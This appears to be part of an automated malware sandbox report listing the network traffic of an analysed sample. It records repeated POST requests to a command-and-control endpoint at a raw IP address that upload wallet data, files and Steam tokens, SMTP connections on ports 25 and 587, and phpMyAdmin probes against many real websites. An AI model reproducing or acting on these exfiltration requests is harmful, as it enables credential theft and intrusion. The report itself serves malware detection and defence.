name="message"wallets------IIDHJKFBGIIJJKFIJDBG--
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFCHost: 185.172.128.79Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 35 39 66 36 64 31 39 35 30 63 65 33 31 65 65 34 36 65 66 66 38 66 35 66 65 61 61 31 30 36 62 33 33 32 39 64 36 62 37 32 31 30 62 33 62 64 61 39 63 37 36 38 31 32 39 36 35 36 39 35 62 36 61 39 37 66 39 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 2d 2d 0d 0a Data Ascii: ------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="message"files------BAKEBAFIIECBGCAAAAFC--
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGDGIDGIJKKEBGDAECAHost: 185.172.128.79Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDHCFIJEGCAKJJKEHJJEHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFCBAKKFBFIECAEBAEHost: 185.172.128.79Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGDHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKEBAECGCBAAAAAEBAHost: 185.172.128.79Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKJEHDBGHIEBGCGDGHHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGDHost: 185.172.128.79Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFIIHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKFHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFIIHost: 185.172.128.79Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJJKEGHJKFHJKFHDHCFHost: 185.172.128.79Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGHDGHCGHDHJKFBFBKHost: 185.172.128.79Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECFHDBAAECAAKFHDHIIHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAAKJKJEBGHJKFHIDGCHost: 185.172.128.79Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCAFIIDHIDGHIECGDGIHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKECBGIIIEBGCBGIDHDHost: 185.172.128.79Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFCBKJDBFIJKFHIIDAAHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDGCGDBGCAAEBFIECGHHost: 185.172.128.79Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIEHJDBKJKECBFHDGHJHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBAAAKFCAFIIDHIDGHIEHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFBKKEBKEBGIDHIEHCFHost: 185.172.128.79Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBKJJKEBGHIDGCBKJJDHost: 185.172.128.79Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBGCBAFCGDAAKFIDGIEHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKEBAECGCBAAAAAEBAHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKJEHDBGHIEBGCGDGHHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGDHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFIIHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKFHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKFHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJJKEGHJKFHJKFHDHCFHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGIJKFIJDAAAKFHIEGHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCAHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCFHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFIIHost: 185.172.128.79Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFHHost: 185.172.128.79Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 35 39 66 36 64 31 39 35 30 63 65 33 31 65 65 34 36 65 66 66 38 66 35 66 65 61 61 31 30 36 62 33 33 32 39 64 36 62 37 32 31 30 62 33 62 64 61 39 63 37 36 38 31 32 39 36 35 36 39 35 62 36 61 39 37 66 39 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 2d 2d 0d 0a Data Ascii: ------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="file"------GCBGIIECGHCAKECAFBFH--
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCBHost: 185.172.128.79Content-Length: 142507Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBGCBAFCGDAAKFIDGIEHost: 185.172.128.79Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 35 39 66 36 64 31 39 35 30 63 65 33 31 65 65 34 36 65 66 66 38 66 35 66 65 61 61 31 30 36 62 33 33 32 39 64 36 62 37 32 31 30 62 33 62 64 61 39 63 37 36 38 31 32 39 36 35 36 39 35 62 36 61 39 37 66 39 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 2d 2d 0d 0a Data Ascii: ------JEBGCBAFCGDAAKFIDGIEContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------JEBGCBAFCGDAAKFIDGIEContent-Disposition: form-data; name="message"jbdtaijovg------JEBGCBAFCGDAAKFIDGIE--
                Source: Joe Sandbox ViewIP Address: 3.134.125.175 3.134.125.175
                Source: Joe Sandbox ViewIP Address: 3.134.125.175 3.134.125.175
                Source: Joe Sandbox ViewIP Address: 77.88.21.249 77.88.21.249
                Source: Joe Sandbox ViewASN Name: PRODEPA-EmpTecdaInfeComdoEstadodoParaBR PRODEPA-EmpTecdaInfeComdoEstadodoParaBR
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: AWALNET-ASNSA AWALNET-ASNSA
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Joe Sandbox ViewJA3 fingerprint: 523e76adb7aac8f6a8b2bf1f35d85d1f
                Source: Joe Sandbox ViewJA3 fingerprint: 83d60721ecc423892660e275acc4dffd
                Source: unknownFTP traffic detected: 54.71.181.160:21 -> 192.168.2.6:52159 220 BIENVENIDOS!
                Source: global trafficTCP traffic: 192.168.2.6:55419 -> 35.186.223.180:25
                Source: global trafficTCP traffic: 192.168.2.6:55435 -> 108.177.12.14:25
                Source: global trafficTCP traffic: 192.168.2.6:55454 -> 20.231.114.24:587
                Source: global trafficTCP traffic: 192.168.2.6:55458 -> 184.25.164.103:587
                Source: global trafficTCP traffic: 192.168.2.6:55479 -> 138.197.59.199:25
                Source: global trafficTCP traffic: 192.168.2.6:55673 -> 104.255.105.79:587
                Source: global trafficTCP traffic: 192.168.2.6:55685 -> 104.21.14.245:25
                Source: global trafficTCP traffic: 192.168.2.6:56877 -> 170.114.52.4:587
                Source: global trafficTCP traffic: 192.168.2.6:61922 -> 103.224.212.34:587
                Source: global trafficTCP traffic: 192.168.2.6:62797 -> 44.199.96.179:587
                Source: global trafficTCP traffic: 192.168.2.6:62837 -> 3.134.125.175:587
                Source: global trafficTCP traffic: 192.168.2.6:62926 -> 122.56.56.210:587
                Source: global trafficTCP traffic: 192.168.2.6:63012 -> 103.90.225.70:587
                Source: global trafficTCP traffic: 192.168.2.6:63023 -> 163.247.44.239:25
                Source: global trafficTCP traffic: 192.168.2.6:63044 -> 190.152.216.14:25
                Source: global trafficTCP traffic: 192.168.2.6:63059 -> 185.51.191.48:587
                Source: global trafficTCP traffic: 192.168.2.6:49198 -> 205.220.166.26:587
                Source: global trafficTCP traffic: 192.168.2.6:49221 -> 186.113.7.204:587
                Source: global trafficTCP traffic: 192.168.2.6:49537 -> 104.21.39.206:587
                Source: global trafficTCP traffic: 192.168.2.6:49626 -> 52.21.29.94:587
                Source: global trafficTCP traffic: 192.168.2.6:49631 -> 3.22.30.40:587
                Source: global trafficTCP traffic: 192.168.2.6:49709 -> 45.43.208.39:587
                Source: global trafficTCP traffic: 192.168.2.6:49712 -> 34.160.13.42:587
                Source: global trafficTCP traffic: 192.168.2.6:49741 -> 77.240.114.212:587
                Source: global trafficTCP traffic: 192.168.2.6:50728 -> 104.17.62.50:587
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resergvearyinitiani.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gemcreedarticulateod.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: secretionsuitcasenioise.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: claimconcessionrebe.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: liabilityarrangemenyit.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=9RUsUazyB.C4a8i3viqneeFdT5roxFxN7GFEttoXrL8-1707131551-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: liabilityarrangemenyit.shop
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: naukrigulf.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nuevopacto.runacode.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: rage.mpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: opsu.terna.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.faceit.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: genshin.mihoyo.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: multiideas.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: es-la.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: idp.uitgeverij-deviant.nlAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: lookaside.fbsbx.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: money-farm.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: casinocontroller.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: connect.appen.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: poligrafosecuador.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: us04web.zoom.usAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: netizion.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: web.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hi-in.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: pl-pl.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: warriorplus.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mw.redsa.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sport.autoplay.cloudAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: v.xsanime.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: innovationdevelopment.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: terna.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hero-wars.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: uh.isAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nossoplayer.meAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
